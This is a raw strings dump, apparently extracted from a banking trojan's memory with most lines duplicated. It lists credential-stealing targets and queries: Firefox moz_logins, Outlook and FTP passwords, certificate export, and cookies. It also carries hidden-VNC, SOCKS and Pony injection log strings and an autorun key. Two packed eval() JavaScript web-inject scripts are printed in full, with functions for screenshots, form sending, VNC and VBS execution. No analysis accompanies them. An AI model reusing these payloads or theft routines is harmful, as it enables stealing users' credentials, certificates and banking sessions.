PasswordType

profiles.xml

profiles.xml

\FTP Explorer

\FTP Explorer

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\Profiles

Software\FTP Explorer\Profiles

FtpSite.xml

FtpSite.xml

PK11_GetInternalKeySlot

PK11_GetInternalKeySlot

sqlite3.dll

sqlite3.dll

sqlite3_prepare

sqlite3_prepare

sqlite3_step

sqlite3_step

sqlite3_column_bytes

sqlite3_column_bytes

sqlite3_column_blob

sqlite3_column_blob

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

PTF://

PTF://

signons.sqlite

signons.sqlite

\profiles.ini

\profiles.ini

PathToExe

PathToExe

\Mozilla\Firefox\

\Mozilla\Firefox\

Firefox

Firefox

Software\Mozilla

Software\Mozilla

fireFTPsites.dat

fireFTPsites.dat

\Mozilla\SeaMonkey\

\Mozilla\SeaMonkey\

SeaMonkey

SeaMonkey

\Mozilla\Profiles\

\Mozilla\Profiles\

Mozilla

Mozilla

password 51:b:

password 51:b:

SMTP Email Address

SMTP Email Address

SMTP Server

SMTP Server

SMTP User Name

SMTP User Name

HTTP User

HTTP User

HTTP Server URL

HTTP Server URL

HTTPMail User Name

HTTPMail User Name

HTTPMail Server

HTTPMail Server

SMTP User

SMTP User

POP3 Port

POP3 Port

SMTP Port

SMTP Port

IMAP Port

IMAP Port

POP3 Password2

POP3 Password2

IMAP Password2

IMAP Password2

NNTP Password2

NNTP Password2

HTTPMail Password2

HTTPMail Password2

SMTP Password2

SMTP Password2

POP3 Password

POP3 Password

IMAP Password

IMAP Password

NNTP Password

NNTP Password

HTTPMail Password

HTTPMail Password

SMTP Password

SMTP Password

{X-X-X-XX-XXXXXX}

{X-X-X-XX-XXXXXX}

inetcomm server passwords

inetcomm server passwords

outlook account manager passwords

outlook account manager passwords

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Pstorec.dll

Pstorec.dll

[VNC] EXEC: %s

[VNC] EXEC: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[VDESK] Read CMD %u[%u]

[VDESK] Read CMD %u[%u]

[VDESK] NOT AUTH CMD %u

[VDESK] NOT AUTH CMD %u

GetAsyncKeyState

GetAsyncKeyState

USER32.DLL

USER32.DLL

GetKeyboardState

GetKeyboardState

GetKeyState

GetKeyState

?WINMM.DLL

?WINMM.DLL

?DSOUND.DLL

?DSOUND.DLL

ZwConnectPort

ZwConnectPort

NTDLL.DLL

NTDLL.DLL

[VNC] PROCESS=%s

[VNC] PROCESS=%s

\explorer.exe

\explorer.exe

[VNC] SearchApp Status = %u

[VNC] SearchApp Status = %u

[VNC] FileName = %s

[VNC] FileName = %s

[VNC] CmdLine = %s

[VNC] CmdLine = %s

[VNC] W64 Redir OLD=%u

[VNC] W64 Redir OLD=%u

[VNC] CreateProcess Status = %u (%u)

[VNC] CreateProcess Status = %u (%u)

SysShadow

SysShadow

Chrome_WidgetWin_1

Chrome_WidgetWin_1

Chrome_WidgetWin_0

Chrome_WidgetWin_0

d3d10_1.dll

d3d10_1.dll

d3d10_1core.dll

d3d10_1core.dll

d3d10.dll

d3d10.dll

d3d10core.dll

d3d10core.dll

d2d1.dll

d2d1.dll

OPENGL32.dll

OPENGL32.dll

d3d9.dll

d3d9.dll

d3d11.dll

d3d11.dll

Dxtrans.dll

Dxtrans.dll

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

RegCloseKey

RegCloseKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

NETAPI32.dll

NETAPI32.dll

SHDeleteKeyA

SHDeleteKeyA

SHLWAPI.dll

SHLWAPI.dll

DeleteUrlCacheEntry

DeleteUrlCacheEntry

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

MSVCRT.dll

MSVCRT.dll

IPHLPAPI.DLL

IPHLPAPI.DLL

AVIFIL32.dll

AVIFIL32.dll

GetWindowsDirectoryW

GetWindowsDirectoryW

CallNamedPipeA

CallNamedPipeA

ConnectNamedPipe

ConnectNamedPipe

CreateNamedPipeW

CreateNamedPipeW

DisconnectNamedPipe

DisconnectNamedPipe

CreateNamedPipeA

CreateNamedPipeA

GetWindowsDirectoryA

GetWindowsDirectoryA

EnumWindows

EnumWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

SetViewportOrgEx

SetViewportOrgEx

RegEnumKeyExA

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyA

RegCreateKeyExA

RegCreateKeyExA

RegOpenKeyExA

RegOpenKeyExA

CryptImportKey

CryptImportKey

CryptDestroyKey

CryptDestroyKey

RegOpenKeyA

RegOpenKeyA

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

CertOpenSystemStoreA

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertDeleteCertificateFromStore

CertAddCertificateContextToStore

CertAddCertificateContextToStore

CertCloseStore

CertCloseStore

CertEnumCertificatesInStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXExportCertStoreEx

CRYPT32.dll

CRYPT32.dll

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

FindCloseUrlCache

FindCloseUrlCache

FindNextUrlCacheEntryW

FindNextUrlCacheEntryW

FindFirstUrlCacheEntryW

FindFirstUrlCacheEntryW

COMDLG32.dll

COMDLG32.dll

WININET.DLL

WININET.DLL

=)=2===~=

=)=2===~=

3 343=3_3

3 343=3_3

= =,=`=}=

= =,=`=}=

.pdata

.pdata

@.reloc

@.reloc

[%s - X64 EQ PID: %u TID: %u]

[%s - X64 EQ PID: %u TID: %u]

\SysWOW64\regsvr32.exe

\SysWOW64\regsvr32.exe

[Pony] Fail create process: %u

[Pony] Fail create process: %u

[PONY] Fail inject to process: %u

[PONY] Fail inject to process: %u

echrome.dll

echrome.dll

iexplore.exe

iexplore.exe

chrome.exe

chrome.exe

\System32\KERNEL32.DLL

\System32\KERNEL32.DLL

\System32\kernelbase.dll

\System32\kernelbase.dll

\ThemeApiPort

\ThemeApiPort

jqs.exe_1592_rwx_01210000_0007C000:

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

HHt.HHt

HHt.HHt

More information: hXXp://VVV.ibsensoftware.com/

More information: hXXp://VVV.ibsensoftware.com/

8HttpAddRequestHeadersA

8HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestA

HttpOpenRequestW

HttpOpenRequestW

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

wininet.dll

wininet.dll

rapport

rapport

ieframe.dll

ieframe.dll

NSPR4.DLL

NSPR4.DLL

nss3.dll

nss3.dll

KERNEL32.DLL

KERNEL32.DLL

\Google\Chrome\User Data\Default\

\Google\Chrome\User Data\Default\

\Mozilla\Firefox\Profiles\

\Mozilla\Firefox\Profiles\

sol_chrome/

sol_chrome/

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\

.rdata

.rdata

@http

@http

SELECT url FROM moz_places

SELECT url FROM moz_places

places.sqlite

places.sqlite

ie/history.txt

ie/history.txt

ff/history.txt

ff/history.txt

ff/%u/places.sqlite

ff/%u/places.sqlite

framework_key%

framework_key%

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));

eval('var %s '

eval('var %s '

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));

%s.Key = '%s';

%s.Key = '%s';

%s.Hide('%0.8X%0.8X');

%s.Hide('%0.8X%0.8X');

CertificateAuthority

CertificateAuthority

%s.pfx

%s.pfx

cookies.sqlite

cookies.sqlite

cookies.sqlite-journal

cookies.sqlite-journal

ff/%u/cookies.sqlite

ff/%u/cookies.sqlite

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

Software\df5a3418-685e-4e1f-a26a-aabf17af39b8

[%s - X32 EQ PID: %u TID: %u]

[%s - X32 EQ PID: %u TID: %u]

X-Firefox-Spdy

X-Firefox-Spdy

X-WebKit-CSP

X-WebKit-CSP

hXXps://

hXXps://

HTTP/1.1 200 OK

HTTP/1.1 200 OK

Content-Length: %u

Content-Length: %u

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.0

GET /favicon.ico HTTP/1.0

login=%s&pass=%s

login=%s&pass=%s

chrome.dll

chrome.dll

127.0.0.1

127.0.0.1

DrWeb

DrWeb

McAfee.com

McAfee.com

Doctor Web

Doctor Web

Common Files\Doctor Web

Common Files\Doctor Web

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

regsvr32.exe "%s"

regsvr32.exe "%s"

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws

[VNC] Parse param error: %s

[VNC] Parse param error: %s

\regsvr32.exe

\regsvr32.exe

[VNC] Fail create process: %u

[VNC] Fail create process: %u

[VNC] Fail inject to process: %u

[VNC] Fail inject to process: %u

fv_%u.avi

fv_%u.avi

#FV_%u

#FV_%u

#FV_%s

#FV_%s

pass.txt

pass.txt

cert.pfx

cert.pfx

PFXImportCertStore

PFXImportCertStore

Crypt32.dll

Crypt32.dll

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3", false);

user_pref("network.http.spdy.enabled.v3-1", false);

user_pref("network.http.spdy.enabled.v3-1", false);

prefs.js

prefs.js

csrss.exe

csrss.exe

smss.exe

smss.exe

wininit.exe

wininit.exe

services.exe

services.exe

svchost.exe

svchost.exe

lsas.exe

lsas.exe

lsm.exe

lsm.exe

winlogon.exe

winlogon.exe

taskhost.exe

taskhost.exe

HttpEndRequestA

HttpEndRequestA

HttpEndRequestW

HttpEndRequestW

ADVAPI32.DLL

ADVAPI32.DLL

Init in Browser = %u

Init in Browser = %u

Init in Shell = %u

Init in Shell = %u

[Socks] Failt connect BC [%s:%u]

[Socks] Failt connect BC [%s:%u]

[Socks] Fail parse param: %s

[Socks] Fail parse param: %s

Shell Update Exists %s = %s

Shell Update Exists %s = %s

Shell Reload status = %u = %u

Shell Reload status = %u = %u

#cert

#cert

Del Old = %s

Del Old = %s

Del Reg = %s

Del Reg = %s

Fail Save New = %u

Fail Save New = %u

Reg Autorun = %u = %u = %ws = %ws

Reg Autorun = %u = %u = %ws = %ws

Updated fail size %u != %u

Updated fail size %u != %u

Updated RSA Init fail = %u

Updated RSA Init fail = %u

Sign Bad = %u

Sign Bad = %u

Save New File = %u = %u

Save New File = %u = %u

Update_InstallNew = %u = %u

Update_InstallNew = %u = %u

[Pony] Fail Get Pass

[Pony] Fail Get Pass

Start Update: %s = %u

Start Update: %s = %u

download status = %u =%u

download status = %u =%u

Updated status = %u

Updated status = %u

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC LOAD ERROR: %u = %s

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status [Pipe]: %u-%u-%u-%u

DL_EXEC Status[Local]: %u = %u

DL_EXEC Status[Local]: %u = %u

Start Socks addr: %s

Start Socks addr: %s

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Pipe]: %u-%u-%u

Start Socks Status[Local]: %u

Start Socks Status[Local]: %u

Start VNC addr: %s

Start VNC addr: %s

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Pipe]: %u-%u-%u

Start VNC Status[Local]: %u

Start VNC Status[Local]: %u

msvcrt.dll

msvcrt.dll

%0.8X%0.8X%c

%0.8X%0.8X%c

firefox.exe

firefox.exe

explorer.exe

explorer.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

%Program Files%\Mozilla Firefox\

%Program Files%\Mozilla Firefox\

mozsqlite3.dll

mozsqlite3.dll

sqlite3_open

sqlite3_open

sqlite3_exec

sqlite3_exec

sqlite3_close

sqlite3_close

sqlite3_free

sqlite3_free

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

hXXp://

hXXp://

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

\\.\pipe\

\\.\pipe\

PID: %u [%0.2u:%0.2u:%0.2u]

PID: %u [%0.2u:%0.2u:%0.2u]

[BC] Cmd Ver Error

[BC] Cmd Ver Error

[BC] Wait Ping error %u[%u]

[BC] Wait Ping error %u[%u]

[BC] Fail Connect: %u

[BC] Fail Connect: %u

[BC] Fail read cmd

[BC] Fail read cmd

[BC] Cmd need reauth

[BC] Cmd need reauth

[BC] cmd error: %u

[BC] cmd error: %u

[BC] Cmd need disconnect

[BC] Cmd need disconnect

ntdll.dll

ntdll.dll

gdiplus.dll

gdiplus.dll

GdiplusShutdown

GdiplusShutdown

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

account.cfg

account.cfg

account.cfn

account.cfn

Dir #%u

Dir #%u

.oeaccount

.oeaccount

Software\Microsoft\Windows Live Mail

Software\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

\Microsoft\Windows Live Mail

Software\Microsoft\Windows Mail

Software\Microsoft\Windows Mail

\Microsoft\Windows Mail

\Microsoft\Windows Mail

PopPort

PopPort

PopPassword

PopPassword

SmtpServer

SmtpServer

SmtpPort

SmtpPort

SmtpAccount

SmtpAccount

SmtpPassword

SmtpPassword

abe2869f-9b47-4cd9-a358-c22904dba7f7

abe2869f-9b47-4cd9-a358-c22904dba7f7

MS IE FTP Passwords

MS IE FTP Passwords

